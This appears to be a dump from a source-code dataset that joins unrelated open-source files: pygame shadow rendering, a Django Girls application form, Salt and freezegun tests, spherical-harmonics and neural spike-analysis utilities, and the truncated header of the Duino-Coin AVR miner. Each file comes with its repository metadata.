corner_shadow_surface.fill(pygame.Color('#00000000'))
pygame.draw.circle(corner_shadow_surface,
pygame.Color(r, g, b, int(shadow_alpha)),
corner_centre,
corner_radius)
final_corner_surface.blit(corner_shadow_surface,
(0, 0),
special_flags=pygame.BLEND_RGBA_ADD)
# increments/decrements
shadow_alpha += alpha_increment
corner_radius -= aa_amount
edge_shadow_fade_height -= aa_amount
return final_corner_surface, final_edge_surface
def create_new_rectangle_shadow(
self,
width: int,
height: int,
shadow_width_param: int,
corner_radius_param: int,
aa_amount: int = 4,
color: Tuple3IntType = (0, 0, 0)
) -> Optional['pygame.Surface']:
"""
Creates a rectangular shadow surface at the specified size and stores it for later use.
:param width: The width of the base shadow to create
:param height: The height of the base shadow to create
:param shadow_width_param: The width of the shadowed edge
:param corner_radius_param: The radius of the rectangular shadow's corners
:param aa_amount: Antialiasing
:param color: Shadow color (r, g, b)
        :return: Shadow
"""
assert isinstance(width, int)
assert isinstance(height, int)
assert_vector(color, 3, int)
shadow_width_param, corner_radius_param, aa_amount = int(shadow_width_param), \
int(corner_radius_param), int(aa_amount)
if width < corner_radius_param or height < corner_radius_param or shadow_width_param == 0:
return None
r, g, b = color
params = [width, height, shadow_width_param, corner_radius_param, aa_amount, r, g, b]
shadow_id = '_'.join(str(param) for param in params)
if shadow_id in self._short_term_rect_cache:
return self._short_term_rect_cache[shadow_id]
final_surface = pygame.surface.Surface((width, height), flags=pygame.SRCALPHA, depth=32)
final_surface.fill(pygame.Color('#00000000'))
corner_index_id = str(shadow_width_param) + 'x' + str(corner_radius_param)
if corner_index_id in self._preloaded_shadow_corners:
edges_and_corners = self._preloaded_shadow_corners[corner_index_id]
else:
edges_and_corners = self._create_shadow_corners(
shadow_width_param=shadow_width_param,
corner_radius_param=corner_radius_param,
color=color,
aa_amount=aa_amount
)
final_surface.blit(edges_and_corners['top_left'], (0, 0))
final_surface.blit(edges_and_corners['top_right'], (width - corner_radius_param, 0))
final_surface.blit(edges_and_corners['bottom_left'],
(0, height - corner_radius_param))
final_surface.blit(edges_and_corners['bottom_right'],
(width - corner_radius_param, height - corner_radius_param))
if width - (2 * corner_radius_param) > 0:
top_edge = pygame.transform.scale(edges_and_corners['top'],
(width - (2 * corner_radius_param),
shadow_width_param))
bottom_edge = pygame.transform.scale(edges_and_corners['bottom'],
(width - (2 * corner_radius_param),
shadow_width_param))
final_surface.blit(top_edge, (corner_radius_param, 0))
final_surface.blit(bottom_edge, (corner_radius_param, height - shadow_width_param))
if height - (2 * corner_radius_param) > 0:
left_edge = pygame.transform.scale(edges_and_corners['left'],
(shadow_width_param,
height - (2 * corner_radius_param)))
right_edge = pygame.transform.scale(edges_and_corners['right'],
(shadow_width_param,
height - (2 * corner_radius_param)))
final_surface.blit(left_edge, (0, corner_radius_param))
final_surface.blit(right_edge, (width - shadow_width_param,
corner_radius_param))
self._short_term_rect_cache[shadow_id] = final_surface
return final_surface
def create_new_ellipse_shadow(
self,
width: int,
height: int,
shadow_width_param: int,
aa_amount: int = 4,
color: Tuple3IntType = (0, 0, 0)
) -> Optional['pygame.Surface']:
"""
Creates an ellipse shaped shadow surface at the specified size and stores it for later use.
:param width: The width of the shadow to create
:param height: The height of the shadow to create
:param shadow_width_param: The width of the shadowed edge
:param aa_amount: The amount of anti-aliasing to use, defaults to 4
:param color: Shadow color (r, g, b)
:return: Surface with shadow
"""
assert isinstance(width, int)
assert isinstance(height, int)
assert_vector(color, 3, int)
shadow_width_param, aa_amount = int(shadow_width_param), int(aa_amount)
if shadow_width_param == 0:
return None
shadow_surface = pygame.surface.Surface((width * aa_amount, height * aa_amount),
flags=pygame.SRCALPHA, depth=32)
shadow_surface.fill(pygame.Color('#00000000'))
r, g, b = color
ellipse_id = str(width) + 'x' + str(height) + 'x' + str(shadow_width_param)
if ellipse_id in self._created_ellipse_shadows:
return self._created_ellipse_shadows[ellipse_id]
alpha_increment = max(1, int(20 / shadow_width_param))
shadow_alpha = alpha_increment
shadow_width = width * aa_amount
shadow_height = height * aa_amount
for i in range(shadow_width_param):
if shadow_width > 0 and shadow_height > 0:
shadow_rect = pygame.Rect(i * aa_amount,
i * aa_amount,
shadow_width,
shadow_height)
pygame.draw.ellipse(shadow_surface,
pygame.Color(r, g, b, shadow_alpha), shadow_rect)
shadow_width -= (2 * aa_amount)
shadow_height -= (2 * aa_amount)
shadow_alpha += alpha_increment
final_surface = pygame.transform.smoothscale(shadow_surface, (width, height))
self._created_ellipse_shadows[ellipse_id] = final_surface
return final_surface
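# Illustrative usage sketch (not part of the original module; "target" and the blit
# position are hypothetical). Shadows are cached by their parameter string, so
# repeated requests at the same size reuse the same surface:
#
#   generator = ShadowGenerator()
#   shadow = generator.create_new_rectangle_shadow(200, 120, shadow_width_param=10,
#                                                  corner_radius_param=20)
#   if shadow is not None:
#       target.blit(shadow, (50, 50))
#   generator.clear_short_term_caches(force=True)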
|
e2058ffa263161b909f39fc2ff6f19e7f584f62d
|
88ce889124078382c9835c2aeca101ca79302bca
|
/applications/questions.py
|
866ac43845f5715e9fea0681c50b41a741c5746b
|
[
"BSD-3-Clause"
] |
permissive
|
DjangoGirls/djangogirls
|
9cb6c145e9fa10bcf3f06a70d025ff31d96346eb
|
2b2fc151354906ac116dd8cd9a9f4f412dee26af
|
refs/heads/main
| 2023-08-30T15:43:27.162564
| 2023-07-27T11:51:40
| 2023-07-27T11:51:40
| 20,439,809
| 504
| 347
|
BSD-3-Clause
| 2023-08-30T09:25:53
| 2014-06-03T11:13:57
|
Python
|
UTF-8
|
Python
| false
| false
| 5,951
|
py
|
questions.py
|
from collections import OrderedDict
from django import forms
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
def get_organiser_menu(page_url):
"""
Get menu entries for organiser-visible pages
"""
menu = [
{"title": _("Applications"), "url": reverse("applications:applications", args=[page_url])},
{"title": _("Messaging"), "url": reverse("applications:communication", args=[page_url])},
]
return menu
def generate_form_from_questions(questions):
fields = OrderedDict()
for question in questions:
options = {
"label": question.title,
"help_text": question.help_text or None,
"required": question.is_required,
}
name = f"question_{question.pk}"
if question.question_type == "text":
options["widget"] = forms.Textarea
if question.question_type == "choices":
choices = ((x, x) for x in question.choices.split(";"))
options["choices"] = choices
if question.question_type in ["paragraph", "text"]:
fields[name] = forms.CharField(**options)
elif question.question_type == "choices":
if question.is_multiple_choice:
options["widget"] = forms.CheckboxSelectMultiple
fields[name] = forms.MultipleChoiceField(**options)
else:
options["widget"] = forms.RadioSelect
fields[name] = forms.ChoiceField(**options)
if question.question_type == "email":
fields[name] = forms.EmailField(**options)
fields["newsletter_optin"] = forms.ChoiceField(
widget=forms.RadioSelect,
label=_("Do you want to receive news from the Django Girls team?"),
help_text=_(
"No spam, pinky swear! Only helpful programming tips and "
"latest news from the Django Girls world. We send it once every two weeks."
),
required=True,
choices=(("yes", _("Yes, please!")), ("no", _("No, thank you."))),
)
return fields
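# Illustrative usage sketch (an assumption, not taken from this repository): the
# OrderedDict returned above maps onto Django's declarative form machinery, e.g. by
# building a form class dynamically from the fields:
#
#   fields = generate_form_from_questions(questions)
#   ApplicationForm = type("ApplicationForm", (forms.Form,), dict(fields))
#   form = ApplicationForm(data=request.POST)   # "questions" and "request" are hypothetical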
DEFAULT_QUESTIONS = [
{
"title": _("What's your name?"),
"question_type": "paragraph",
},
{
"title": _("Your e-mail address:"),
"question_type": "email",
},
{
"title": _("Your phone number:"),
"help_text": _("Include your country prefix"),
"question_type": "paragraph",
},
{
"title": _("Where are you from?"),
"help_text": _("City, Country"),
"question_type": "paragraph",
},
{
"title": _("How old are you?"),
"question_type": "paragraph",
"is_required": False,
},
{
"title": _("Which operating system do you use?"),
"question_type": "choices",
"choices": "Mac OS X; Windows; Linux",
"is_multiple_choice": True,
},
{
"title": _("What is your current level of experience with programming?"),
"question_type": "choices",
"choices": _(
"I'm a total beginner, I don't know anything about it; "
"I've tried some HTML or CSS before; I've tried some JavaScript "
"before; I've done a few lessons of Python; I've built a website "
"before; I work as a programmer"
),
"is_multiple_choice": True,
},
{
"title": _(
"If you checked anything other than beginner, could you "
"tell us a bit more about your programming knowledge?"
),
"question_type": "text",
"is_required": False,
},
{
"title": _("What is your current occupation?"),
"help_text": _("What is your current job? Are you a student?"),
"question_type": "text",
},
{
"title": _("Why do you want to attend the workshop?"),
"help_text": _("Tell us about your motivations and aspirations."),
"question_type": "text",
},
{
"title": _("How are you planning to share what you've learnt with others?"),
"help_text": _(
"Django Girls is a volunteer-run organisation and we "
"look for people who are active and can help us help more women get "
"into the field. We want you to share what you learn at the workshop "
"with others in different ways: by organising a Django Girls event "
"in your city, talking about Django Girls on your local meetups, "
"writing a blog or simply teaching your friends."
),
"question_type": "text",
"is_required": False,
},
{
"title": _("How did you hear about Django Girls?"),
"question_type": "choices",
"choices": "; ".join(["Facebook", "Twitter", "From a friend", "PyLadies"]),
"is_required": False,
"is_multiple_choice": True,
},
{
"title": _("I acknowledge that some of my data will be used on Third Party Sites and Services."),
"help_text": _(
"Data collected through this form is used only for the "
"purpose of Django Girls events. We're using Third Party Sites "
"and Services to make it happen: for example, we're using "
"Sendgrid to send you emails. Don't worry: We don't share your data with spammers, "
"and we don't sell it! More info on our Privacy policy "
"<a href='/privacy-cookies/'>here</a>."
),
"question_type": "choices",
"choices": _("Yes"),
"is_required": True,
"is_multiple_choice": True,
},
{
"title": _(
"It is important that all attendees comply with the " "<a href='/coc/'>Django Girls Code of Conduct</a>"
),
"question_type": "choices",
"choices": _("I've read and understood the Django Girls Code of Conduct"),
"is_required": True,
"is_multiple_choice": True,
},
]
|
c6e49577f9835691cbe504050fc5472d0d02ad4f
|
d110546d747d7e3865ce5742d5fca09f404623c0
|
/tests/integration/grains/test_custom.py
|
17a09a4797ebf64b4a948e1cfc0eccd59effbf59
|
[
"Apache-2.0",
"MIT",
"BSD-2-Clause"
] |
permissive
|
saltstack/salt
|
354fc86a7be1f69514b3dd3b2edb9e6f66844c1d
|
1ef90cbdc7203f97775edb7666db86a41eb9fc15
|
refs/heads/master
| 2023-07-19T20:56:20.210556
| 2023-06-29T23:12:28
| 2023-07-19T11:47:47
| 1,390,248
| 11,026
| 6,296
|
Apache-2.0
| 2023-09-14T20:45:37
| 2011-02-20T20:16:56
|
Python
|
UTF-8
|
Python
| false
| false
| 519
|
py
|
test_custom.py
|
"""
Test the core grains
"""
import pytest
from tests.support.case import ModuleCase
@pytest.mark.windows_whitelisted
class TestGrainsCore(ModuleCase):
"""
    Test the core grains
"""
@pytest.mark.slow_test
def test_grains_passed_to_custom_grain(self):
"""
test if current grains are passed to grains module functions that have a grains argument
"""
self.assertEqual(
self.run_function("grains.get", ["custom_grain_test"]), "itworked"
)
|
79113ddaeba9ba50bd9a5e7fdcf2ca3a2615e6f2
|
cfe182e58878e570e52102805912b4b7f63b16dc
|
/sph_harm.py
|
1d445b01d90132a1a1253d6f480d160aced3e5a0
|
[] |
no_license
|
QijingZheng/VaspBandUnfolding
|
dfbe04ac55af7fd88a0c3c4e0bcc6257de49fc32
|
43a5a4fafc2079912ba8b978958b0e238a9e818c
|
refs/heads/master
| 2023-08-18T17:56:50.140704
| 2023-08-12T04:50:29
| 2023-08-12T04:50:29
| 90,606,540
| 168
| 76
| null | 2023-07-16T03:41:00
| 2017-05-08T08:51:01
|
Python
|
UTF-8
|
Python
| false
| false
| 6,182
|
py
|
sph_harm.py
|
#!/usr/bin/env python
import numpy as np
from scipy.special import sph_harm
def cart2sph(xyz, epsilon=1E-10):
'''
    Convert Cartesian coordinates to spherical coordinates.
    input:
        xyz in (n, 3)
    return (in this order):
        r: norm
        phi: azimuthal angle in [0, 2 * pi]
        theta: polar angle in [0, pi]
'''
xyz = np.asarray(xyz, dtype=float)
if xyz.ndim == 1:
xyz = xyz[None, :]
x, y, z = xyz.T
# the azimuthal angle
phi = np.arctan2(y, x)
# np.arctan2 outputs angle in [-pi, pi]
phi[phi < 0] += 2 * np.pi
# the norm
r = np.linalg.norm(np.c_[x, y, z], axis=1)
# in case of zero division
r[r < epsilon] = epsilon
# the polar angle
theta = np.arccos(z / r)
return np.array([r, phi, theta])
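# Illustrative sketch (not part of the original module): unit vectors along z and x
# map to (r, phi, theta) = (1, 0, 0) and (1, 0, pi/2) respectively.
def _demo_cart2sph():
    r, phi, theta = cart2sph([[0.0, 0.0, 1.0], [1.0, 0.0, 0.0]])
    assert np.allclose(r, [1.0, 1.0])
    assert np.allclose(phi, [0.0, 0.0])
    assert np.allclose(theta, [0.0, np.pi / 2])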
def sph_c(xyz, l, m=None):
'''
    Complex spherical harmonics including the Condon-Shortley phase.
https://en.wikipedia.org/wiki/Table_of_spherical_harmonics#Spherical_harmonics
input:
xyz: cartesian coordinate of shape [n, 3]
'''
xyz = np.asarray(xyz, dtype=float)
if xyz.ndim == 1:
xyz = xyz[None, :]
    if m is not None:
assert -l <= m <= l, "'m' must be in the range of [{},{}]".format(-l, l)
r, phi, theta = cart2sph(xyz)
N = xyz.shape[0]
ylm = [sph_harm(M, l, phi, theta) for M in range(-l, l+1)]
if m is None:
return np.array(ylm, dtype=complex).T
else:
return np.array(ylm, dtype=complex).T[:, m+l]
def sph_r(xyz, l, m=None):
'''
    Real spherical harmonics.
https://en.wikipedia.org/wiki/Table_of_spherical_harmonics#Real_spherical_harmonics
'''
ylm_c = sph_c(xyz, l)
u = sph_u_c2r(l)
if m is None:
return np.dot(ylm_c, u.T).real
else:
return np.dot(ylm_c, u.T).real[:, m+l]
def sph_u_c2r(l):
'''
Set up transformation matrix complex->real spherical harmonics.
please refer to:
https://en.wikipedia.org/wiki/Spherical_harmonics#Real_form
U_R2C is the conjugate transpose of U_C2R
'''
# A strange bug:
# https://stackoverflow.com/questions/9887549/negative-exponent-with-numpy-array-operand/42776488
l = int(l)
TLP1 = 2 * l + 1
U_C2R = np.zeros((TLP1, TLP1), dtype=complex)
sqrt2inv = 1.0 / np.sqrt(2.0)
for ii in range(TLP1):
M = ii - l
if (M < 0):
U_C2R[ii, ii] = 1j * sqrt2inv
U_C2R[ii, -(ii+1)] = -1j * (-1)**M * sqrt2inv
if (M == 0):
U_C2R[ii, ii] = 1.0
if (M > 0):
U_C2R[ii, -(ii+1)] = sqrt2inv
U_C2R[ii, ii] = (-1)**M * sqrt2inv
return U_C2R
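# Illustrative sketch (not part of the original module): the complex->real
# transformation matrix is unitary, so U @ U^H is the identity for any l.
def _demo_sph_u_c2r():
    l = 2
    U = sph_u_c2r(l)
    assert np.allclose(U @ U.conj().T, np.eye(2 * l + 1))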
def sph_u_r2c(l):
'''
Transformation matrix real->complex spherical harmonics
'''
return sph_u_c2r(l).conj().T
def show_sph_harm(l, m, real=True, N=50, use_sphere=True, plot='mpl'):
'''
Show the spherical harmonics on a unit sphere
'''
assert plot.lower() in ['mpl', 'mayavi', 'plotly']
theta = np.linspace(0, np.pi, N)
phi = np.linspace(0, 2*np.pi, N)
theta, phi = np.meshgrid(theta, phi)
# The Cartesian coordinates of the unit sphere
x = np.sin(theta) * np.cos(phi)
y = np.sin(theta) * np.sin(phi)
z = np.cos(theta)
xyz = np.c_[x.ravel(), y.ravel(), z.ravel()]
# from time import time
# t0 = time()
if real:
ylm = sph_r(xyz, l, m).reshape(N, N)
else:
ylm = sph_c(xyz, l, m).reshape(N, N).real
# t1 = time()
# print(t1 - t0)
# Calculate the spherical harmonic Y(l,m) and normalize to [0,1]
fcolors = ylm
fmax, fmin = fcolors.max(), fcolors.min()
fcolors = (fcolors - fmin)/(fmax - fmin)
if not use_sphere:
r0 = np.abs(ylm)
if plot.lower() == 'mpl':
import matplotlib.pyplot as plt
from matplotlib import cm, colors
from mpl_toolkits.mplot3d import Axes3D
# Set the aspect ratio to 1 so our sphere looks spherical
fig = plt.figure(
figsize=plt.figaspect(1.)
)
ax = fig.add_subplot(111, projection='3d')
if use_sphere:
ax.plot_surface(x, y, z, rstride=1, cstride=1,
facecolors=cm.seismic(fcolors))
xmax = ymax = zmax = np.max([x, y, z])
xmin = ymin = zmin = np.min([x, y, z])
else:
ax.plot_surface(x*r0, y*r0, z*r0, rstride=1, cstride=1,
facecolors=cm.seismic(fcolors))
xmax = ymax = zmax = np.max([r0*x, r0*y, r0*z])
xmin = ymin = zmin = np.min([r0*x, r0*y, r0*z])
# Turn off the axis planes
# ax.set_axis_off()
ax.set_xlim(xmin, xmax)
ax.set_ylim(ymin, ymax)
ax.set_zlim(zmin, zmax)
ax.set_xticks([])
ax.set_yticks([])
ax.set_zticks([])
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
plt.show()
    elif plot.lower() == 'mayavi':
from mayavi import mlab
fig = mlab.figure(
size=(800, 800),
bgcolor=(1,1,1)
)
if use_sphere:
mlab.mesh(x, y, z, colormap='seismic', scalars=fcolors)
else:
mlab.mesh(x*r0, y*r0, z*r0, colormap='seismic', scalars=fcolors)
mlab.orientation_axes()
mlab.show()
else:
import plotly.graph_objects as go
if use_sphere:
fig = go.Figure(
data=[
go.Surface(
z=z, x=x, y=y,
surfacecolor=fcolors,
colorscale='balance', showscale=False, opacity=1.0,
hoverinfo='none'
)
],
)
else:
fig = go.Figure(
data=[
go.Surface(
z=r0*z, x=r0*x, y=r0*y,
surfacecolor=fcolors,
colorscale='balance', showscale=False, opacity=1.0,
hoverinfo='none'
)
],
)
fig.update_layout(
width=800, height=800,
)
fig.show()
if __name__ == "__main__":
show_sph_harm(l=2, m=1, real=True, use_sphere=False, plot='mayavi')
|
ba339338a73958d251fd31798b05a82ee800f4f9
|
0ec2b0a2caf2cc5e0ec2bbb89aefc10fc5c63047
|
/tests/test_class_import.py
|
709dc6e17cba874a810c894d284840eac87cad87
|
[
"Apache-2.0"
] |
permissive
|
spulec/freezegun
|
3d8406eaf4c3ffa72f884162a278a332eaee4a94
|
4f4496380deefceead7bef23bccaca17c2bdecfa
|
refs/heads/master
| 2023-08-30T22:29:16.153344
| 2023-02-22T05:49:22
| 2023-02-22T05:49:22
| 7,106,250
| 3,480
| 294
|
Apache-2.0
| 2023-08-24T21:19:36
| 2012-12-11T05:11:00
|
Python
|
UTF-8
|
Python
| false
| false
| 6,101
|
py
|
test_class_import.py
|
import time
import sys
from .fake_module import (
fake_date_function,
fake_datetime_function,
fake_gmtime_function,
fake_localtime_function,
fake_strftime_function,
fake_time_function,
)
from . import fake_module
from freezegun import freeze_time
from freezegun.api import (
FakeDatetime,
FakeDate,
fake_time,
fake_localtime,
fake_gmtime,
fake_strftime,
)
import datetime
@freeze_time("2012-01-14")
def test_import_datetime_works():
assert fake_datetime_function().day == 14
@freeze_time("2012-01-14")
def test_import_date_works():
assert fake_date_function().day == 14
@freeze_time("2012-01-14")
def test_import_time():
local_time = datetime.datetime(2012, 1, 14)
utc_time = local_time - datetime.timedelta(seconds=time.timezone)
expected_timestamp = time.mktime(utc_time.timetuple())
assert fake_time_function() == expected_timestamp
def test_start_and_stop_works():
freezer = freeze_time("2012-01-14")
result = fake_datetime_function()
assert result.__class__ == datetime.datetime
assert result.__class__ != FakeDatetime
freezer.start()
assert fake_datetime_function().day == 14
assert isinstance(fake_datetime_function(), datetime.datetime)
assert isinstance(fake_datetime_function(), FakeDatetime)
freezer.stop()
result = fake_datetime_function()
assert result.__class__ == datetime.datetime
assert result.__class__ != FakeDatetime
def test_isinstance_works():
date = datetime.date.today()
now = datetime.datetime.now()
freezer = freeze_time('2011-01-01')
freezer.start()
assert isinstance(date, datetime.date)
assert not isinstance(date, datetime.datetime)
assert isinstance(now, datetime.datetime)
assert isinstance(now, datetime.date)
freezer.stop()
def test_issubclass_works():
real_date = datetime.date
real_datetime = datetime.datetime
freezer = freeze_time('2011-01-01')
freezer.start()
assert issubclass(real_date, datetime.date)
assert issubclass(real_datetime, datetime.datetime)
freezer.stop()
def test_fake_uses_real_when_ignored():
real_time_before = time.time()
with freeze_time('2012-01-14', ignore=['tests.fake_module']):
real_time = fake_time_function()
real_time_after = time.time()
assert real_time_before <= real_time <= real_time_after
def test_can_ignore_email_module():
from email.utils import formatdate
with freeze_time('2012-01-14'):
faked_date_str = formatdate()
before_date_str = formatdate()
with freeze_time('2012-01-14', ignore=['email']):
date_str = formatdate()
after_date_str = formatdate()
assert date_str != faked_date_str
assert before_date_str <= date_str <= after_date_str
@freeze_time('2011-01-01')
def test_avoid_replacing_equal_to_anything():
assert fake_module.equal_to_anything.description == 'This is the equal_to_anything object'
@freeze_time("2012-01-14 12:00:00")
def test_import_localtime():
struct = fake_localtime_function()
assert struct.tm_year == 2012
assert struct.tm_mon == 1
assert struct.tm_mday >= 13 # eg. GMT+14
assert struct.tm_mday <= 15 # eg. GMT-14
@freeze_time("2012-01-14 12:00:00")
def test_fake_gmtime_function():
struct = fake_gmtime_function()
assert struct.tm_year == 2012
assert struct.tm_mon == 1
assert struct.tm_mday == 14
@freeze_time("2012-01-14")
def test_fake_strftime_function():
assert fake_strftime_function() == '2012'
def test_import_after_start():
with freeze_time('2012-01-14'):
assert 'tests.another_module' not in sys.modules.keys()
from tests import another_module
# Reals
assert another_module.get_datetime() is datetime.datetime
assert another_module.get_datetime() is FakeDatetime
assert another_module.get_date() is datetime.date
assert another_module.get_date() is FakeDate
assert another_module.get_time() is time.time
assert another_module.get_time() is fake_time
assert another_module.get_localtime() is time.localtime
assert another_module.get_localtime() is fake_localtime
assert another_module.get_gmtime() is time.gmtime
assert another_module.get_gmtime() is fake_gmtime
assert another_module.get_strftime() is time.strftime
assert another_module.get_strftime() is fake_strftime
# Fakes
assert another_module.get_fake_datetime() is FakeDatetime
assert another_module.get_fake_date() is FakeDate
assert another_module.get_fake_time() is fake_time
assert another_module.get_fake_localtime() is fake_localtime
assert another_module.get_fake_gmtime() is fake_gmtime
assert another_module.get_fake_strftime() is fake_strftime
# Reals
assert another_module.get_datetime() is datetime.datetime
assert not another_module.get_datetime() is FakeDatetime
assert another_module.get_date() is datetime.date
assert not another_module.get_date() is FakeDate
assert another_module.get_time() is time.time
assert not another_module.get_time() is fake_time
assert another_module.get_localtime() is time.localtime
assert not another_module.get_localtime() is fake_localtime
assert another_module.get_gmtime() is time.gmtime
assert not another_module.get_gmtime() is fake_gmtime
assert another_module.get_strftime() is time.strftime
assert not another_module.get_strftime() is fake_strftime
# Fakes
assert another_module.get_fake_datetime() is FakeDatetime
assert another_module.get_fake_date() is FakeDate
assert another_module.get_fake_time() is fake_time
assert another_module.get_fake_localtime() is fake_localtime
assert another_module.get_fake_gmtime() is fake_gmtime
assert another_module.get_fake_strftime() is fake_strftime
del sys.modules['tests.another_module']
def test_none_as_initial():
with freeze_time() as ft:
ft.move_to('2012-01-14')
assert fake_strftime_function() == '2012'
|
d4958d660aaa09702436e99cf5ee5b8de77c81bd
|
d813a392c7cbc8dbbec273b3a2366a50f9df45c9
|
/bmtk/analyzer/spikes_analyzer.py
|
af77187a618f82ecc153c796587a665d2f51cd96
|
[
"BSD-3-Clause"
] |
permissive
|
AllenInstitute/bmtk
|
1496d6e0bd7cbef7b1b8cac64a8589d01548f897
|
ae9c24c415a3fbd60397b4ead160b72b4b3e4e4f
|
refs/heads/develop
| 2023-08-24T20:09:32.763686
| 2023-08-20T18:29:19
| 2023-08-20T18:29:19
| 104,507,294
| 253
| 111
|
BSD-3-Clause
| 2023-08-24T14:38:57
| 2017-09-22T18:42:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,787
|
py
|
spikes_analyzer.py
|
# Copyright 2017. Allen Institute. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import pandas as pd
import numpy as np
try:
from distutils.version import LooseVersion
use_sort_values = LooseVersion(pd.__version__) >= LooseVersion('0.19.0')
except:
use_sort_values = False
def spikes2dict(spikes_file):
spikes_df = pd.read_csv(spikes_file, sep=' ', names=['time', 'gid'])
if use_sort_values:
spikes_sorted = spikes_df.sort_values(['gid', 'time'])
else:
spikes_sorted = spikes_df.sort(['gid', 'time'])
spike_dict = {}
for gid, spike_train in spikes_sorted.groupby('gid'):
spike_dict[gid] = np.array(spike_train['time'])
return spike_dict
def spike_files_equal(spikes_txt_1, spikes_txt_2, err=0.0001):
trial_1 = spikes2dict(spikes_txt_1)
trial_2 = spikes2dict(spikes_txt_2)
if set(trial_1.keys()) != set(trial_2.keys()):
return False
for gid, spike_train1 in trial_1.items():
spike_train2 = trial_2[gid]
if len(spike_train1) != len(spike_train2):
return False
for s1, s2 in zip(spike_train1, spike_train2):
if abs(s1 - s2) > err:
return False
return True
def get_mean_firing_rates(spike_gids, node_ids, tstop_msec):
"""
Compute mean firing rate over the duration of the simulation
:param spike_gids: gids of cells which spiked
:param node_ids: np.array of node_ids
:return mean_firing_rate: np.array mean firing rates
"""
min_gid = np.min(node_ids)
max_gid = np.max(node_ids)
gid_bins = np.arange(min_gid-0.5,max_gid+1.5,1)
hist,bins = np.histogram(spike_gids, bins=gid_bins)
tstop_sec = tstop_msec*1E-3
mean_firing_rates = hist/tstop_sec
return mean_firing_rates
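# A minimal worked illustration (not part of the original module): three cells
# with gids 0..2, where only gid 1 spikes (twice) during a 1000 ms run, give
# mean rates of [0, 2, 0] Hz.
def _mean_firing_rate_example():
    rates = get_mean_firing_rates(spike_gids=np.array([1, 1]),
                                  node_ids=np.array([0, 1, 2]),
                                  tstop_msec=1000.0)
    assert np.allclose(rates, [0.0, 2.0, 0.0])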
def spikes_equal_in_window(spikes1,spikes2,twindow):
"""
Compare spikes within a time window
:param spikes1: dict with "time" and "gid" arrays for raster 1
:param spikes2: dict with "time" and "gid" arrays for raster 2
:param twindow: [tstart,tend] time window
:return boolean: True if equal, False if different
"""
ix1_window0=np.where(spikes1["time"]>twindow[0])
ix1_window1=np.where(spikes1["time"]<twindow[1])
ix1_window = np.intersect1d(ix1_window0,ix1_window1)
ix2_window0=np.where(spikes2["time"]>twindow[0])
ix2_window1=np.where(spikes2["time"]<twindow[1])
ix2_window = np.intersect1d(ix2_window0,ix2_window1)
print(len(spikes1["time"][ix1_window]),len(spikes2["time"][ix2_window]))
if len(spikes1["time"][ix1_window]) != len(spikes2["time"][ix2_window]):
print("There is a DIFFERENT number of spikes in each file within the window")
print("No point to compare individual spikes")
        return False
else:
print("number of spikes are the same, checking details...")
ix1_sort = np.argsort(spikes1["time"][ix1_window],kind="mergesort")
ix2_sort = np.argsort(spikes2["time"][ix2_window],kind="mergesort")
if (np.array_equal(spikes1["gid"][ix1_window[ix1_sort]],spikes2["gid"][ix2_window[ix2_sort]])) and (np.array_equal(spikes1["time"][ix1_window[ix1_sort]],spikes2["time"][ix2_window[ix2_sort]])):
print("spikes are IDENTICAL!")
return True
else:
print("spikes are DIFFERENT")
return False
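# A minimal worked illustration (not part of the original module): comparing a
# two-spike raster against itself inside the [0, 10] ms window returns True.
def _spikes_equal_example():
    raster = {"time": np.array([1.0, 5.0]), "gid": np.array([0, 1])}
    assert spikes_equal_in_window(raster, raster, twindow=[0.0, 10.0])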
|
7ef9262273a3c7f5ef9e3659c8253c016a2f63ad
|
b99c294295f1b1d6da8f90562490567b24fd8c8f
|
/AVR_Miner.py
|
be47070cc66e85068cba8e8f54f7e39bd144d175
|
[
"MIT"
] |
permissive
|
revoxhere/duino-coin
|
5d1f97425e29bf885f639f74fc5fc2fb483859b5
|
9cea64d8bd59f9138dc2f160f2caaf5c3f373c8d
|
refs/heads/master
| 2023-08-17T10:43:46.972577
| 2023-08-16T18:02:04
| 2023-08-16T18:02:04
| 200,611,314
| 2,839
| 833
|
MIT
| 2023-09-07T23:41:21
| 2019-08-05T08:07:46
|
Python
|
UTF-8
|
Python
| false
| false
| 50,322
|
py
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 3.5 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2023
"""
from os import _exit, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
from random import choice
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
import zipfile
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread
from threading import Lock as thread_lock
from threading import Semaphore
import base64 as b64
import os
printlock = Semaphore(value=1)
